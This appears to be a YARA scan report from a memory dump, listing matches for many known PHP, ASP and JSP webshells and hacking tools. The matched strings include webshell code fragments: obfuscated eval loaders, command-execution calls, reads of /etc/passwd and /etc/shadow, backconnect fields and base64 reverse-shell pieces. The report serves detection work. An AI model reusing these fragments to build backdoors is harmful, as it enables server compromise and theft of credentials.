00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	sh_php_php	Semi-Auto-generated - file sh.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b1558:$s1: $ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	phpjackal_php	Semi-Auto-generated - file phpjackal.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b2077:$s3: $dl=$_REQUEST['downloaD'];
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	sql_php_php	Semi-Auto-generated - file sql.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a6466:$s2: http://rst.void.ru 0x1b22cd:$s2: http://rst.void.ru 0x1b22f6:$s2: http://rst.void.ru
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	cgi_python_py	Semi-Auto-generated - file cgi-python.py.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b2539:$s0: a CGI by Fuzzyman 0x1b25ba:$s2: values = map(lambda x: x.value, theform[field]) # allows for
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ru24_post_sh_php_php	Semi-Auto-generated - file ru24_post_sh.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x19c2ef:$s4: Writed by DreAmeRz 0x1b288e:$s4: Writed by DreAmeRz
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	telnetd_pl	Semi-Auto-generated - file telnetd.pl.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b2d24:$s0: 0ldW0lf 0x1b2d43:$s1: However you are lucky :P 0x1b2d6b:$s2: I'm FuCKeD 0x1b2d85:$s3: ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# 0x1b2dce:$s4: atrix@irc.brasnet.org
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	php_include_w_shell_php	Semi-Auto-generated - file php-include-w-shell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b32bd:$s1: if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b3341:$s0: Safe0ver 0x1b33cb:$s0: Safe0ver 0x1b352c:$s0: Safe0ver 0x1b354c:$s1: Script Gecisi Tamamlayamadi! 0x1b3578:$s2: document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	shell_php_php	Semi-Auto-generated - file shell.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b37a1:$s1: /* We have found the parent dir. We must be carefull if the parent 0x1b37fc:$s2: $tmpfile = tempnam('/tmp', 'phpshell'); 0x1b3833:$s3: if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	telnet_cgi	Semi-Auto-generated - file telnet.cgi.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x19d31b:$s0: www.rohitab.com 0x1a798b:$s1: W A R N I N G: Private Server 0x1b2fb6:$s1: W A R N I N G: Private Server
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ironshell_php	Semi-Auto-generated - file ironshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b3a57:$s0: www.ironwarez.info 0x1b3aa3:$s2: ~ Shell I 0x1b3abc:$s3: www.rootshell-team.info 0x1b3ae3:$s4: setcookie($cookiename, $_POST['pass'], time()+3600);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	backdoorfr_php	Semi-Auto-generated - file backdoorfr.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b3cfb:$s1: www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	aspydrv_asp	Semi-Auto-generated - file aspydrv.asp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b3f7c:$s0: If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex)) 0x5f3a:$s1: password 0x9850:$s1: password 0x9bfd:$s1: password 0xe7cf:$s1: password 0xeb25:$s1: password 0x1f6bf:$s1: password 0x2279c:$s1: password 0x22a80:$s1: password 0x22a90:$s1: password 0x2cd1d:$s1: password 0x33a04:$s1: password 0x3fef5:$s1: password 0x4136d:$s1: password 0x4784d:$s1: password 0x4be6d:$s1: password 0x57455:$s1: password 0x574e3:$s1: password 0x5752b:$s1: password 0x57574:$s1: password 0x5d04b:$s1: password
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	cmdjsp_jsp	Semi-Auto-generated - file cmdjsp.jsp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b40a3:$s2: cmdjsp.jsp 0x1b4287:$s2: cmdjsp.jsp 0x1c9b60:$s2: cmdjsp.jsp 0x1c9cb0:$s2: cmdjsp.jsp 0x1cdc6a:$s2: cmdjsp.jsp 0x1cde0f:$s2: cmdjsp.jsp 0x1a4b79:$s3: michaeldaw.org 0x1a55e7:$s3: michaeldaw.org 0x1ab545:$s3: michaeldaw.org 0x1b42a1:$s3: michaeldaw.org
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	h4ntu_shell__powered_by_tsoi_	Semi-Auto-generated - file h4ntu shell [powered by tsoi	unknown	0x19aeb6:$s0: h4ntu shell 0x19b013:$s0: h4ntu shell 0x1b4362:$s0: h4ntu shell 0x1b44b0:$s0: h4ntu shell 0x1d0ee8:$s0: h4ntu shell
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Ajan_asp	Semi-Auto-generated - file Ajan.asp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b4758:$s3: http://www35.websamba.com/cybervurgun/
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PHANTASMA_php	Semi-Auto-generated - file PHANTASMA.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b4957:$s0: >[] Safemode Mode Run</DIV> 0x1b4983:$s1: $file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br> 0x1b49df:$s2: [] Spawning Shell 0x1b4a01:$s3: Cha0s
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	MySQL_Web_Interface_Version_0_8_php	Semi-Auto-generated - file MySQL Web Interface Version 0.8.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1aad0f:$s0: SooMin Kim 0x1b4c0b:$s0: SooMin Kim 0x1b4c25:$s1: http://popeye.snu.ac.kr/~smkim/mysql 0x1b4c59:$s2: href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename 0x1b4cad:$s3: <th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0002	Semi-Auto-generated - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b54a0:$s0: <tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i 0x1b5560:$s2: <tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0003	Semi-Auto-generated - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b57b9:$s0: .textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa 0x1b5819:$s2: <input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0005	Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b64fe:$s4: if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0010	Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b5fee:$s2: c99sh_sqlquery
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0013	Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b7d43:$s0: 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', 0x1b7d94:$s1: $name='ec371748dc2da624b35a4f8f685dd122' 0x1a646d:$s2: rst.void.ru 0x1b22d4:$s2: rst.void.ru 0x1b22fd:$s2: rst.void.ru 0x1b7dcc:$s2: rst.void.ru
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0015	Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0xfd1cc:$s1: $_POST['backconnectip'] 0x1b82f5:$s1: $_POST['backconnectip'] 0x1b831c:$s2: $_POST['backcconnmsg']
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0016	Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b8553:$s1: if(rmdir($_POST['mk_name'])) 0x1b857f:$s2: $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_php_webshells	Semi-Auto-generated - from files multiple_php_webshells	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b8b12:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI 0x1d7ac2:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI 0x1b8b72:$s2: sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0 0x1b8bd2:$s4: A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0019	Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b8e31:$s0: <b>Dumped! Dump has been writed to
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0022	Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b971b:$s0: c99ftpbrutecheck 0x1b973b:$s1: $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 0x1b9786:$s2: $fqb_lenght = $nixpwdperpage; 0x1b97bb:$s3: $sock = @ftp_connect($host,$port,$timeout);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0027	Semi-Auto-generated - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ba269:$s0: @$rto=$_POST['rto']; 0x1ba295:$s2: SCROLLBAR-TRACK-COLOR: #91AAFF
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0030	Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ba535:$s0: if ($total === FALSE) {$total = 0;} 0x1ba570:$s1: $free_percent = round(100/($total/$free),2); 0x1ba5fc:$s3: $bool = $isdiskette = in_array($letter,$safemode_diskettes);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0031	Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ba8a1:$s2: 'eng_text30'=>'Cat file',
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	multiple_webshells_0032	Semi-Auto-generated - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1bab5d:$s0: $num = $nixpasswd + $nixpwdperpage; 0x1bab98:$s1: $ret = posix_kill($pid,$sig); 0x1bac10:$s3: $i = $nixpasswd;
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PHP_Cloaked_Webshell_SuperFetchExec	Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC	Florian Roth	0x1a3a9e:$s0: else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_dC3_Security_Crew_Shell_PRiV	PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php	Florian Roth	0x1a443c:$s15: search_file($_POST['search'],urldecode($_POST['dir'])); 0x1a448c:$s16: echo base64_decode($images[$_GET['pic']]); 0x1a44cf:$s20: if (isset($_GET['rename_all'])) {
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_b374k_mini_shell_php_php	PHP Webshells Github Archive - file b374k-mini-shell-php.php.php	Florian Roth	0x1996b4:$s0: @error_reporting(0); 0x1996e0:$s2: @eval(gzinflate(base64_decode($code))); 0x19971f:$s3: @set_time_limit(0);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_Sincap_1_0	PHP Webshells Github Archive - file Sincap 1.0.php	Florian Roth	0x19a9f6:$s5: <title>:: AventGrup ::.. - Sincap 1.0 \| Session(Oturum) B 0x19aa47:$s9: </span>Avrasya Veri ve NetWork Teknolojileri Geli 0x19aa91:$s12: while (($ekinci=readdir ($sedat))){
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_b374k_php	PHP Webshells Github Archive - file b374k.php.php	Florian Roth	0x19accb:$s0: // encrypt your password to md5 here http://kerinci.net/?x=decode 0x19ad24:$s6: // password (default is: b374k) 0x19ad53:$s8: //****************************************************************************** 0x19adb3:$s9: // b374k 2.2
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_h4ntu_shell__powered_by_tsoi_	PHP Webshells Github Archive - file h4ntu shell [powered by tsoi	unknown	0x19b00c:$s11: <title>h4ntu shell [powered by tsoi]</title> 0x19b051:$s13: $cmd = $_POST['cmd']; 0x19b07f:$s16: $uname = posix_uname( ); 0x19b14f:$s20: ob_end_clean();
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_php_webshells_MyShell	PHP Webshells Github Archive - file MyShell.php	Florian Roth	0x19b9e0:$s3: <title>MyShell error - Access Denied</title> 0x19ba67:$s5: //A workdir has been asked for - we chdir to that dir. 0x19bb12:$s13: #$autoErrorTrap Enable automatic error traping if command returns error. 0x19bb73:$s14: /* No work_dir - we chdir to $DOCUMENT_ROOT */ 0x19bbba:$s19: #every command you excecute.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_php_webshells_pHpINJ	PHP Webshells Github Archive - file pHpINJ.php	Florian Roth	0x194089:$s3: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />'; 0x19bdfe:$s3: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />'; 0x19bf1b:$s13: Full server path to a writable file which will contain the Php Shell <br /> 0x19bfb5:$s15: <header>\|\| .::News PHP Shell Injection::. \|\|</header> <br /> <br />
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_ru24_post_sh	PHP Webshells Github Archive - file ru24_post_sh.php	Florian Roth	0x19c23f:$s1: http://www.ru24-team.net 0x19c2cf:$s6: Ru24PostWebShell 0x1b27e8:$s6: Ru24PostWebShell 0x19c2ef:$s7: Writed by DreAmeRz 0x1b288e:$s7: Writed by DreAmeRz 0x19c319:$s9: $function=passthru; // system, exec, cmd
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_hiddens_shell_v1	PHP Webshells Github Archive - file hiddens shell v1.php	Florian Roth	0x199925:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_c99_locus7s	PHP Webshells Github Archive - file c99_locus7s.php	Florian Roth	0x19c534:$s8: $encoded = base64_encode(file_get_contents($d.$f)); 0x19c692:$s19: $nixpwdperpage = 100; // Get first N lines from /etc/passwd
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_cgitelnet	PHP Webshells Github Archive - file cgitelnet.php	Florian Roth	0x19d301:$s9: # Author Homepage: http://www.rohitab.com/ 0x19d398:$s18: # in a command line on Windows NT.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_lamashell	PHP Webshells Github Archive - file lamashell.php	Florian Roth	0x19d621:$s8: $curcmd = $_POST['king']; 0x19d695:$s18: <title>lama's'hell v. 3.0</title> 0x19d6cf:$s19: _\|_ O _ O _\|_
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_Simple_PHP_backdoor_by_DK	PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php	Florian Roth	0x1ab51e:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) --> 0x1ab568:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 0x1cae34:$s6: if(isset($_REQUEST['cmd'])){ 0x1cae68:$s8: system($cmd);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_php_webshells_README	PHP Webshells Github Archive - file README.md	Florian Roth	0x199d6a:$s0: Common php webshells. Do not host the file(s) in your server! 0x199dbf:$s1: php-webshells
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_AK_74_Security_Team_Web_Shell_Beta_Version	PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php	Florian Roth	0x19d937:$s8: - AK-74 Security Team Web Site: www.ak74-team.net 0x19d980:$s9: <b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'. 0x19d9e1:$s10: <b><font color=#83000>Execute system commands!</font></b>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_Gamma_Web_Shell	PHP Webshells Github Archive - file Gamma Web Shell.php	Florian Roth	0x19e21b:$s4: $ok_commands = ['ls', 'ls -l', 'pwd', 'uptime']; 0x19e263:$s8: ### Gamma Group <http://www.gammacenter.com> 0x19e30a:$s20: my $command = $self->query('command');
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_php_include_w_shell	PHP Webshells Github Archive - file php-include-w-shell.php	Florian Roth	0x19f590:$s13: # dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_PhpSpy_Ver_2006	PHP Webshells Github Archive - file PhpSpy Ver 2006.php	Florian Roth	0x19f867:$s2: var_dump(@$shell->RegRead($_POST['readregname']));
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_php_webshells_myshell	PHP Webshells Github Archive - file myshell.php	Florian Roth	0x1a057c:$s15: <title>$MyShellVersion - Access Denied</title>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_php_webshells_lolipop	PHP Webshells Github Archive - file lolipop.php	Florian Roth	0x19a44e:$s3: $commander = $_POST['commander']; 0x19a488:$s9: $sourcego = $_POST['sourcego']; 0x19a4c1:$s20: $result = mysql_query($loli12) or die (mysql_error());
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_simple_cmd	PHP Webshells Github Archive - file simple_cmd.php	Florian Roth	0x1a0842:$s2: <title>G-Security Webshell</title> 0x1b4eda:$s2: <title>G-Security Webshell</title>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_aZRaiLPhp_v1_0	PHP Webshells Github Archive - file aZRaiLPhp v1.0.php	Florian Roth	0x1a0acd:$s0: <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED 0x1a0b27:$s4: $fileperm=base_convert($_POST['fileperm'],8,10);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall	PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php	Florian Roth	0x1a147e:$s2: if(!$result2)$dump_file.='#error table '.$rows[0]; 0x1a14c8:$s4: if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); 0x1a156d:$s20: echo('Dump for '.$db_dump.' now in '.$to_file);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell__findsock_php_findsock_shell_php_reverse_shell	PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php	Florian Roth	0x1a1eb2:$s1: // me at pentestmonkey@pentestmonkey.net
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WebShell_Generic_PHP_6	PHP Webshells Github Archive - from files c0derz shell [csh	unknown	0x1a2133:$s2: @eval(stripslashes($_POST['phpcode'])); 0x1a2172:$s5: echo shell_exec($com); 0x1a21d2:$s8: function execute($com) 0x1a2201:$s12: echo decode(execute($cmd)); 0x1a2235:$s15: echo system($com);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Unpack_Injectt	Webshells Auto-generated - file Injectt.exe	Yara Bulk Rule Generator by Florian Roth	0x1a242f:$s2: %s -Run -->To Install And Run The Service 0x1a2485:$s3: %s -Uninstall -->To Uninstall The Service 0x1a24d5:$s4: (STANDARD_RIGHTS_REQUIRED \|SC_MANAGER_CONNECT \|SC_MANAGER_CREATE_SERVICE \|SC_MAN
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FeliksPack3___PHP_Shells_ssh	Webshells Auto-generated - file ssh.php	Yara Bulk Rule Generator by Florian Roth	0x19b5ae:$s0: eval(gzinflate(str_rot13(base64_decode('
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ZXshell2_0_rar_Folder_ZXshell	Webshells Auto-generated - file ZXshell.exe	Yara Bulk Rule Generator by Florian Roth	0x19cc71:$s0: WPreviewPagesn 0x19cc8f:$s1: DA!OLUTELY N
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	thelast_orice2	Webshells Auto-generated - file orice2.php	Yara Bulk Rule Generator by Florian Roth	0x19ce6c:$s0: $aa = $_GET['aa']; 0x19ce8f:$s1: echo $aa;
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FSO_s_zehir4	Webshells Auto-generated - file zehir4.asp	Yara Bulk Rule Generator by Florian Roth	0x19e972:$s5: byMesaj
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	DarkSpy105	Webshells Auto-generated - file DarkSpy105.exe	Yara Bulk Rule Generator by Florian Roth	0x1a029e:$s7: Sorry,DarkSpy got an unknown exception,please re-run it,thanks!
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FSO_s_reader	Webshells Auto-generated - file reader.asp	Yara Bulk Rule Generator by Florian Roth	0x1a177a:$s2: mailto:mailbomb@hotmail.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HYTop_DevPack_server	Webshells Auto-generated - file server.asp	Yara Bulk Rule Generator by Florian Roth	0x1a29b7:$s0: PageServer Below -->
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	vanquish	Webshells Auto-generated - file vanquish.dll	Yara Bulk Rule Generator by Florian Roth	0x1a2ba1:$s3: You cannot delete protected files/folders! Instead, your attempt has been logged 0x1a2c01:$s8: ?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU 0x1a2c61:$s9: ?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Simple_PHP_BackDooR	Webshells Auto-generated - file Simple_PHP_BackDooR.php	Yara Bulk Rule Generator by Florian Roth	0x18c516:$s0: <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he 0x18c576:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn 0x1ce446:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn 0x18c5d0:$s9: // a simple php backdoor
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	hkshell_hkrmv	Webshells Auto-generated - file hkrmv.exe	Yara Bulk Rule Generator by Florian Roth	0x18cbdd:$s5: /THUMBPOSITION7 0x18cbfd:$s6: \EvilBlade\
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FeliksPack3___PHP_Shells_phpft	Webshells Auto-generated - file phpft.php	Yara Bulk Rule Generator by Florian Roth	0x18cdf2:$s6: PHP Files Thief 0x143786:$s11: http://www.4ngel.net 0x18ce12:$s11: http://www.4ngel.net 0x1a95b8:$s11: http://www.4ngel.net 0x1da8db:$s11: http://www.4ngel.net
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	bdcli100	Webshells Auto-generated - file bdcli100.exe	Yara Bulk Rule Generator by Florian Roth	0x18d43c:$s5: unable to connect to 0x18d461:$s8: backdoor is corrupted on
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	rdrbs084	Webshells Auto-generated - file rdrbs084.exe	Yara Bulk Rule Generator by Florian Roth	0x18d8b2:$s0: Create mapped port. You have to specify domain when using HTTP type. 0x18d906:$s8: <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HYTop_CaseSwitch_2005	Webshells Auto-generated - file 2005.exe	Yara Bulk Rule Generator by Florian Roth	0x18ddfe:$s1: MSComDlg.CommonDialog 0x18de23:$s2: CommonDialog1 0x18de40:$s3: __vbaExceptHandler 0x194fa8:$s3: __vbaExceptHandler 0x18de62:$s4: EVENT_SINK_Release 0x194fca:$s4: EVENT_SINK_Release 0x18de84:$s5: EVENT_SINK_AddRef 0x18dea5:$s6: By Marcos 0x18debe:$s7: EVENT_SINK_QueryInterface 0x18dee7:$s8: MethCallEngine
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FSO_s_casus15_2	Webshells Auto-generated - file casus15.php	Yara Bulk Rule Generator by Florian Roth	0x18e4ef:$s0: copy ( $dosya_gonder 0x1a71e1:$s0: copy ( $dosya_gonder
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	installer	Webshells Auto-generated - file installer.cmd	Yara Bulk Rule Generator by Florian Roth	0x18e6db:$s0: Restore Old Vanquish 0x18e6ff:$s4: ReInstall Vanquish
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	elmaliseker	Webshells Auto-generated - file elmaliseker.asp	Yara Bulk Rule Generator by Florian Roth	0x18f198:$s0: javascript:Command('Download' 0x18f1c5:$s5: zombie_array=array(
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	shelltools_g0t_root_Fport	Webshells Auto-generated - file Fport.exe	Yara Bulk Rule Generator by Florian Roth	0x18fb51:$s4: Copyright 2000 by Foundstone, Inc. 0x18fb83:$s5: You must have administrator privileges to run fport - exiting...
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HYTop_DevPack_upload	Webshells Auto-generated - file upload.asp	Yara Bulk Rule Generator by Florian Roth	0x190433:$s0: PageUpload Below -->
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PasswordReminder	Webshells Auto-generated - file PasswordReminder.exe	Yara Bulk Rule Generator by Florian Roth	0x190639:$s3: The encoded password is found at 0x%8.8lx and has a length of %d.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	dbgntboot	Webshells Auto-generated - file dbgntboot.dll	Yara Bulk Rule Generator by Florian Roth	0x190cbb:$s2: now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp 0x190d1b:$s3: sth junk the M$ Wind0wZ retur
